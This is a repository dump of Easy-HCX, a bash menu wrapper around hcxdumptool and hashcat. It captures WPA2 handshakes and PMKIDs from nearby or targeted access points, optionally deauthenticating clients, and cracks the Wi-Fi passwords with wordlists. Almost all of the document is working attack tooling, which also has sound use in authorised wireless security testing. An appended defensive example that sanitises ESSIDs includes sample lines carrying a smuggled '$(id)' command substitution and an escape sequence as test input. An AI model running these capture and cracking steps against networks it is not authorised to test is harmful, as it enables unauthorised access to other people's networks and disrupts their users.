├── README.md
├── assets
    ├── 01_easy-hcx-prep
    ├── 02_easy-hcx-capture-all
    ├── 03_easy-hcx-capture-targeted
    ├── 04_easy-hcx-convert
    ├── 05_easy-hcx-hashcat
    ├── 06_easy-hcx-capture-info
    └── ap-list
└── easy-hcx.sh


/README.md:
--------------------------------------------------------------------------------
## Easy-HCX

Easy-HCX is a menu-driven script written around hcxtools, hcxdumptool and hashcat. Its goal is not to automate everything, just to make common tasks easier.

hcxtools, hcxdumptool and hashcat are very deep programs with tons of options, so Easy-HCX only covers some of their basic functions, including:

* preparing your wireless interface for captures
* capturing WPA2 handshakes and/or PMKIDs, optionally without deauthenticating clients for stealth or to avoid disrupting clients
* converting capture files to Hashcat's .hccapx or .16800 formats
* viewing information about capture files
* using hashcat to perform dictionary attacks on .hccapx or .16800 files

### Hardware Requirements:
* A wireless interface that supports monitor mode
* A GPU that Hashcat can use

### Software Requirements:
* hcxdumptool
* hcxtools
* hashcat

### Tested with:
* hcxdumptool 5.1.4
* hcxtools 5.1
* hashcat 5.1.0
* Kali Linux 64-bit

User variables are set in easy-hcx.sh. Make sure you look these over.

### Notes:
hcxdumptool's documentation states that it randomizes MAC addresses and handles monitor mode on its own. It also states not to use it on logical interfaces and to leave the physical interface in managed mode. 03_easy-hcx-capture-targeted does manually re-enable monitor mode - this is because after using hcxdumptool to get a list of APs, I found that running hcxdumptool again immediately afterwards would fail inconsistently with error messages saying the interface was busy.

### Link to demo video
[![Demo Video](http://i3.ytimg.com/vi/zJHD1ttgaxw/hqdefault.jpg)](https://youtu.be/zJHD1ttgaxw)


--------------------------------------------------------------------------------
/assets/01_easy-hcx-prep:
--------------------------------------------------------------------------------
#!/bin/bash

# Argument from easy-hcx
nic=$1

# Text coloring
yellow='\033[1;33m'
nc='\033[0m'

echo
echo -e "${yellow}Stopping network-manager service...${nc}"
service network-manager stop

echo
echo -e "${yellow}Killing wpa_supplicant process...${nc}"
pkill wpa_supplicant

echo
echo -e "${yellow}Killing dhclient process...${nc}"
pkill dhclient

echo
echo -e "${yellow}Done${nc}"

echo
read -p $'\e[91m'"Press enter to continue"$'\e[0m'


--------------------------------------------------------------------------------
/assets/02_easy-hcx-capture-all:
--------------------------------------------------------------------------------
#!/bin/bash

# Arguments from easy-hcx
nic=$1
save=$2
status=$3
channel=$4
deauth=$5

# Text coloring
yellow='\033[1;33m'
nc='\033[0m'

echo
echo -e "${yellow}This captures WPA handshakes and PMKIDs from all APs${nc}"

echo
echo -e "${yellow}Enter output name - a folder will be created in "$save" and a capture file inside with this name (.pcapng extension assumed): ${nc}"
read -r file

echo
echo -e "${yellow}Creating $save/$file${nc}"
mkdir -p "$save/$file"

echo
echo -e "${yellow}Running hcxdumptool -i $nic -o $save/$file/$file.pcapng --enable_status=$status -c $channel $deauth${nc}"
echo
echo -e "${yellow}Press Control-C when you've gotten enough.${nc}"
# $deauth stays unquoted on purpose: it is empty when deauthentication is enabled
hcxdumptool -i "$nic" -o "$save/$file/$file.pcapng" --enable_status="$status" -c "$channel" $deauth

read -p $'\e[91m'"Press enter to continue"$'\e[0m'

--------------------------------------------------------------------------------
/assets/03_easy-hcx-capture-targeted:
--------------------------------------------------------------------------------
#!/bin/bash

# Arguments from easy-hcx
nic=$1
save=$2
channel=$3
status=$4
deauth=$5

# Text coloring
yellow='\033[1;33m'
nc='\033[0m'

echo
echo -e "${yellow}This captures WPA handshakes and PMKIDs from a single AP${nc}"

echo
echo -e "${yellow}Enter output name - a folder will be created in "$save" and the capture file inside with this name (.pcapng extension assumed): ${nc}"
read -r file

echo
echo -e "${yellow}Creating $save/$file${nc}"
mkdir -p "$save/$file"

echo
echo -e "${yellow}Now to get a list of APs. Hit control-c once it scans through all the channels or your target appears then copy the MAC address of the target AP.${nc}"
read -p $'\e[91m'"Press enter to continue"$'\e[0m'
./assets/ap-list "$nic" "$channel"

echo
echo -e "${yellow}Enter the MAC address of the targeted AP - make sure the AP is in range!${nc}"
read -r mac

echo
echo -e "${yellow}Saving target AP's MAC to $save/$file/$file.filter${nc}"
echo "$mac" > "$save/$file/$file.filter"

echo
echo -e "${yellow}Re-enabling monitor mode...${nc}"
ifconfig "$nic" down
iwconfig "$nic" mode monitor
ifconfig "$nic" up

echo
echo -e "${yellow}Now to capture a handshake or PMKID. Press Control-C when you've gotten enough.${nc}"

echo
echo -e "${yellow}Running hcxdumptool -i $nic -o $save/$file/$file.pcapng --enable_status=$status --filtermode=3 --filterlist=$save/$file/$file.filter $deauth${nc}"
# $deauth stays unquoted on purpose: it is empty when deauthentication is enabled
hcxdumptool -i "$nic" -o "$save/$file/$file.pcapng" --enable_status="$status" --filtermode=3 --filterlist="$save/$file/$file.filter" $deauth

read -p $'\e[91m'"Press enter to continue"$'\e[0m'

--------------------------------------------------------------------------------
/assets/04_easy-hcx-convert:
--------------------------------------------------------------------------------
#!/bin/bash

# Argument from easy-hcx
save=$1

# Text coloring
yellow='\033[1;33m'
red='\033[1;91m'
nc='\033[0m'

echo
echo -e "${yellow}This converts a pcapng file to a .16800 file and/or .hccapx file for hashcat.${nc}"
echo -e "${yellow}A .hccapx file will be created if WPA captures are available and a .16800 file if PMKIDs were captured${nc}"

echo
echo -e "${yellow}Contents of $save${nc}"
ls --color=auto "$save"
echo

echo -e "${yellow}Enter a directory to see the contents: ${nc}"
while :
do
    read -r dir

    if [ ! -d "$save/$dir" ]
    then
        echo
        echo -e "${red}Directory does not exist. Please try again.${nc}"
        echo
        echo -e "${yellow}Enter a directory to see the contents: ${nc}"
    else
        echo
        echo -e "${yellow}Contents of $save/$dir${nc}"
        ls "$save/$dir"
        echo

        cd "$save/$dir"

        echo -e "${yellow}Enter the pcapng filename: ${nc}"
        while :
        do
            read -r file
            if [ ! -f "$file" ]
            then
                echo
                echo -e "${red}File does not exist. Try again.${nc}"
                echo -e "${yellow}Enter the pcapng filename: ${nc}"
            else
                echo
                base=$(echo "$file" | cut -d "." -f 1)
                echo "$base"
                echo -e "${yellow}Converting pcapng to hccapx and 16800: Running hcxpcaptool -z $base.16800 -o $base.hccapx $file${nc}"
                hcxpcaptool -z "$base.16800" -o "$base.hccapx" "$file"

                echo
                echo -e "${yellow}Checking $base.hccapx for handshakes captured${nc}"
                echo
                wlanhcxinfo -i "$base.hccapx" -a -e

                echo
                # Test the converted file ($base.16800); $file.16800 never exists
                if [ -e "$base.16800" ]
                then
                    echo -e "${yellow}Checking $base.16800 file for PMKIDs captured${nc}"
                    echo
                    # Decode field 4 (hex ESSID) without passing capture-derived text to a shell
                    cut -d '*' -f 4 "$base.16800" | while read -r essid
                    do
                        printf '%s\n' "$essid" | xxd -r -p
                        echo
                    done
                    echo
                    read -p $'\e[91m'"Press enter to continue"$'\e[0m'
                    exit 1
                else
                    echo -e "${red}No PMKIDs captured${nc}"
                    echo
                    read -p $'\e[91m'"Press enter to continue"$'\e[0m'
                    exit 1
                fi
            fi
        done
    fi
done


--------------------------------------------------------------------------------
/assets/05_easy-hcx-hashcat:
--------------------------------------------------------------------------------
#!/bin/bash

# Arguments from easy-hcx
save=$1
wordlist=$2

# Text coloring
yellow='\033[1;33m'
red='\033[1;91m'
nc='\033[0m'

echo
echo -e "${yellow}This uses hashcat to crack either a WPA capture or a PMKID capture file${nc}"
echo

echo -e "${yellow}Contents of $save${nc}"
ls --color=auto "$save"
echo

echo -e "${yellow}Choose a directory to see its contents: ${nc}"
while :
do
    read -r dir
    if [ ! -d "$save/$dir" ]
    then
        echo
        echo -e "${red}Directory does not exist. Please try again.${nc}"
        echo
        echo -e "${yellow}Enter a directory to see the contents: ${nc}"
    else
        echo
        echo -e "${yellow}Contents of $save/$dir${nc}"
        ls "$save/$dir"
        cd "$save/$dir"

        echo
        echo -e "${yellow}Enter the filename with .16800 or .hccapx extension to crack: ${nc}"
        while :
        do
            read -r file
            echo
            if [ ! -f "$file" ]
            then
                echo -e "${red}File does not exist. Try again.${nc}"
                echo -e "${yellow}Enter the filename with extension to crack: ${nc}"
            else
                # Determine extension of file
                filename=$(basename -- "$file")
                extension="${filename##*.}"

                if [ "$extension" != "16800" ] && [ "$extension" != "hccapx" ]
                then
                    echo -e "${red}Invalid file extension. Must be a 16800 or hccapx file.${nc}"
                    echo
                    echo -e "${yellow}Enter the filename with extension to crack: ${nc}"
                else
                    echo -e "${yellow}Contents of $wordlist${nc}"
                    ls "$wordlist"
                    echo
                    echo -e "${yellow}Enter the wordlist to use. Entering nothing will use all files in $wordlist: ${nc}"
                    read -r list

                    if [ "$extension" = "16800" ]
                    then
                        echo
                        echo -e "${yellow}Running hashcat -m 16800 $file -a 0 -o $save/$dir/$dir.cracked $wordlist/$list${nc}"
                        echo
                        cmd="hashcat -m 16800 $file -a 0 -o $save/$dir/$dir.cracked $wordlist/"
                        hashcat -m 16800 "$file" -a 0 -o "$save/$dir/$dir.cracked" "$wordlist/$list"
                    elif [ "$extension" = "hccapx" ]
                    then
                        echo
                        echo -e "${yellow}Running hashcat -m 2500 $file -a 0 -o $save/$dir/$dir.cracked $wordlist/$list${nc}"
                        echo
                        cmd="hashcat -m 2500 $file -a 0 -o $save/$dir/$dir.cracked $wordlist/"
                        hashcat -m 2500 "$file" -a 0 -o "$save/$dir/$dir.cracked" "$wordlist/$list"
                    fi
                    echo
                    echo -e "${yellow}Enter the wordlist to use, ls to show wordlists or q to quit. Entering nothing will use all files in $wordlist: ${nc}"
                    echo

                    while read -r list2
                    do
                        if [ "$list2" = "q" ]
                        then
                            echo
                            echo -e "${yellow}If a password was found, it has been saved to $save/$dir/$dir.cracked. You can also view it with 'hashcat -m 2500/16800 --show'${nc}"
                            echo
                            read -p $'\e[91m'"Press enter to continue"$'\e[0m'
                            exit
                        elif [ "$list2" = "ls" ]
                        then
                            echo
                            echo -e "${yellow}Contents of $wordlist${nc}"
                            ls "$wordlist"
                            echo
                            echo -e "${yellow}Enter the wordlist to use, ls to show wordlists or q to quit. Entering nothing will use all files in $wordlist: ${nc}"
                            echo
                        else
                            echo
                            echo -e "${yellow}Running $cmd$list2${nc}"
                            echo
                            # Unquoted on purpose: the saved command line is split into words here
                            $cmd$list2
                            echo
                            echo -e "${yellow}Enter the wordlist to use, ls to show wordlists or q to quit. Entering nothing will use all files in $wordlist ${nc}"
                            echo
                        fi
                    done

                fi
            fi
        done
    fi
done

--------------------------------------------------------------------------------
/assets/06_easy-hcx-capture-info:
--------------------------------------------------------------------------------
#!/bin/bash

# Argument from easy-hcx
save=$1

# Text coloring
yellow='\033[1;33m'
red='\033[1;91m'
nc='\033[0m'

echo
echo -e "${yellow}This shows handshakes captured in a .hccapx file or PMKIDs captured in a .16800 file${nc}"

echo
echo -e "${yellow}Contents of $save${nc}"
ls --color=auto "$save"

echo
echo -e "${yellow}Enter a directory to see the contents: ${nc}"
while :
do
    read -r dir

    if [ ! -d "$save/$dir" ]
    then
        echo
        echo -e "${red}Directory does not exist. Please try again.${nc}"
        echo
        echo -e "${yellow}Enter a directory to see the contents: ${nc}"
    else

        echo
        echo -e "${yellow}Contents of $save/$dir${nc}"
        ls "$save/$dir"

        echo
        echo -e "${yellow}Enter the .hccapx or .16800 filename: ${nc}"
        while :
        do
            read -r file
            cd "$save/$dir"
            if [ ! -f "$file" ]
            then
                echo -e "${red}File does not exist. Try again.${nc}"
                echo
                echo -e "${yellow}Enter the .hccapx or .16800 filename: ${nc}"
            else

                # Determine extension of file
                filename=$(basename -- "$file")
                extension="${filename##*.}"

                if [ "$extension" != "16800" ] && [ "$extension" != "hccapx" ]
                then
                    echo
                    echo -e "${red}Invalid file extension. Must be a 16800 or hccapx file.${nc}"
                    echo
                    echo -e "${yellow}Enter the .hccapx or .16800 filename: ${nc}"
                elif [ "$extension" = "hccapx" ]
                then
                    echo
                    echo -e "${yellow}Checking $file for handshakes captured${nc}"
                    wlanhcxinfo -i "$file" -a -e
                    echo
                    read -p $'\e[91m'"Press enter to continue"$'\e[0m'
                    exit 1
                else
                    # Only the 16800 extension can reach this branch
                    echo
                    echo -e "${yellow}Checking $file for PMKIDs captured${nc}"
                    # Decode field 4 (hex ESSID) without passing capture-derived text to a shell
                    cut -d '*' -f 4 "$file" | while read -r essid
                    do
                        printf '%s\n' "$essid" | xxd -r -p
                        echo
                    done
                    echo
                    read -p $'\e[91m'"Press enter to continue"$'\e[0m'
                    exit 1
                fi
            fi
        done
    fi
done

--------------------------------------------------------------------------------
/assets/ap-list:
--------------------------------------------------------------------------------
#!/bin/bash

nic=$1
channel=$2

# Text coloring
yellow='\033[1;33m'
red='\033[1;91m'
nc='\033[0m'

echo
echo -e "${yellow}This will list available wifi networks. Copy the MAC address of the target AP and control-C when done${nc}"

echo
echo -e "${yellow}Running hcxdumptool -i $nic --do_rcascan -c $channel${nc}"

hcxdumptool -i "$nic" --do_rcascan -c "$channel"


--------------------------------------------------------------------------------
/easy-hcx.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Website: https://t3chnocat.com

# Text coloring
yellow='\033[1;33m'
red='\033[1;91m'
nc='\033[0m'

##### User variables start #####

# Change this to your wireless interface name
nic=wlan1

# Change this to the directory you want to save captures to
save=/root/wpa-captures

# Change this to your wordlist folder
wordlist=/usr/share/wordlists

# Wifi channels to be scanned - default is all
channel=1,2,3,4,5,6,7,8,9,10,11,12,13,14,36,38,40,42,44,46,48,52,54,56,58,60,62,64,100,102,104,106,108,110,112,114,116,118,120,122,124,126,128,132,134,136,138,140,149,151,153,155,157,159,161

# Verbosity of status while capturing. 1=EAPOL, 2=PROBEREQUEST/PROBERESPONSE, 4=AUTHENTICATION, 8=ASSOCIATION. This is a bitmask, so set it to 15 (1+2+4+8) to see all
status=1

# Comment this to enable deauthentication of clients. WARNING: THIS CAN BE DISRUPTIVE
deauth=--disable_deauthentications

##### User variables end #####

while :
do

    clear

    echo
    echo -e "${yellow} _____    _    ______   __    _   _  ______  __ ${nc}"
    echo -e "${yellow}| ____|  / \  / ___\ \ / /   | | | |/ ___\ \/ / ${nc}"
    echo -e "${yellow}|  _|   / _ \ \___ \\ V _____| |_| | |    \  / ${nc}"
    echo -e "${yellow}| |___ / ___ \ ___) || |_____|  _  | |___ /  \ ${nc}"
    echo -e "${yellow}|_____/_/   \_|____/ |_|     |_| |_|\____/_/\_\ ${nc}"
    echo
    echo -e "${red} -Written by t3chnocat-${nc}"
    echo
    echo "1. Prepare the wifi adapter"
    echo "2. Capture all the things!"
    echo "3. Targeted capture"
    echo "4. Convert capture files for Hashcat"
    echo "5. Crack files with Hashcat"
    echo "6. View handshakes/PMKIDs from capture file"
    echo
    echo
    echo "Any other key to exit."

    echo
    read -p $'\e[91m'"Enter the number of the action you want: "$'\e[0m' action

    if [ "$action" = "1" ]
    then
        ./assets/01_easy-hcx-prep $nic
    elif [ "$action" = "2" ]
    then
        ./assets/02_easy-hcx-capture-all $nic $save $status $channel $deauth
    elif [ "$action" = "3" ]
    then
        ./assets/03_easy-hcx-capture-targeted $nic $save $channel $status $deauth
    elif [ "$action" = "4" ]
    then
        ./assets/04_easy-hcx-convert $save
    elif [ "$action" = "5" ]
    then
        ./assets/05_easy-hcx-hashcat $save $wordlist
    elif [ "$action" = "6" ]
    then
        ./assets/06_easy-hcx-capture-info $save
    else
        exit
    fi
done

--------------------------------------------------------------------------------
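
The 04 and 06 scripts print the ESSID decoded from field 4 of each .16800 line. That value is set by whoever operates the access point, so it is untrusted input shown on a root terminal. The following is an added example, not part of Easy-HCX: it validates every field before decoding and replaces non-printable bytes. The function names and sample lines are constructed for illustration, and the PMKID*MAC_AP*MAC_STA*ESSID layout is the assumed hashcat mode 16800 format.

```shell
#!/bin/sh
# Added example: list the ESSIDs in a hashcat mode-16800 file while treating
# every field as untrusted. Assumed layout: PMKID*MAC_AP*MAC_STA*ESSID (hex).

is_hex() {  # is_hex STRING [LENGTH]: hex digits only, optional exact length
    case $1 in
        ''|*[!0-9a-fA-F]*) return 1 ;;
    esac
    [ -z "$2" ] || [ "${#1}" -eq "$2" ]
}

hex_to_printable() {  # decode hex; bytes outside 0x20-0x7e are shown as '?'
    hex=$1 out=
    while [ -n "$hex" ]; do
        byte=${hex%"${hex#??}"}   # first two hex digits
        hex=${hex#??}
        code=$((0x$byte))
        if [ "$code" -ge 32 ] && [ "$code" -le 126 ]; then
            out=$out$(printf '%b' "\\0$(printf '%03o' "$code")")
        else
            out="$out?"
        fi
    done
    printf '%s' "$out"
}

list_pmkid_essids() {  # stdin: .16800 lines; stdout: "<AP MAC> <ESSID>"
    while IFS='*' read -r pmkid ap sta essid extra || [ -n "$pmkid" ]; do
        if [ -z "$extra" ] && is_hex "$pmkid" 32 && is_hex "$ap" 12 &&
           is_hex "$sta" 12 && is_hex "$essid" &&
           [ "${#essid}" -le 64 ] && [ $(( ${#essid} % 2 )) -eq 0 ]; then
            printf '%s %s\n' "$ap" "$(hex_to_printable "$essid")"
        else
            echo "skipping malformed line" >&2
        fi
    done
}

sample_16800() {  # constructed sample lines, not real capture data
    cat <<'EOF'
00112233445566778899aabbccddeeff*020000000001*020000000002*486f6d654e6574
ffeeddccbbaa99887766554433221100*020000000003*020000000004*1b5b324a43616665
0123456789abcdef0123456789abcdef*020000000005*020000000006*$(id)
EOF
}

# ESSID 2 carries an escape sequence; line 3 has a non-hex field with shell syntax
sample_16800 | list_pmkid_essids
```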